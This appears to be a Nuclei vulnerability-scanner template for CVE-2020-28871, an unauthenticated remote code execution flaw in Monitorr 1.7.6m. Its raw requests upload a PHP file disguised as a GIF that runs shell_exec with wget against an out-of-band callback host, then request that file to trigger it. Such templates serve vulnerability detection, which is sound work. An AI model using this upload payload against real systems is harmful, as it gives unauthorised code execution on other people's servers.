id: CVE-2020-28871

info:
  name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
  reference:
    - https://www.exploit-db.com/exploits/48980
    - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28871
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28871
    cwe-id: CWE-434
  tags: cve,cve2020,monitorr,rce,oast,unauth

requests:
  - raw:
      - |
        POST /assets/php/upload.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: text/plain, */*; q=0.01
        Connection: close
        Accept-Language: en-US,en;q=0.5
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}

        -----------------------------31046105003900160576454225745
        Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
        Content-Type: image/gif

        GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");

        -----------------------------31046105003900160576454225745--

      - |
        GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# Enhanced by mp on 2022/03/27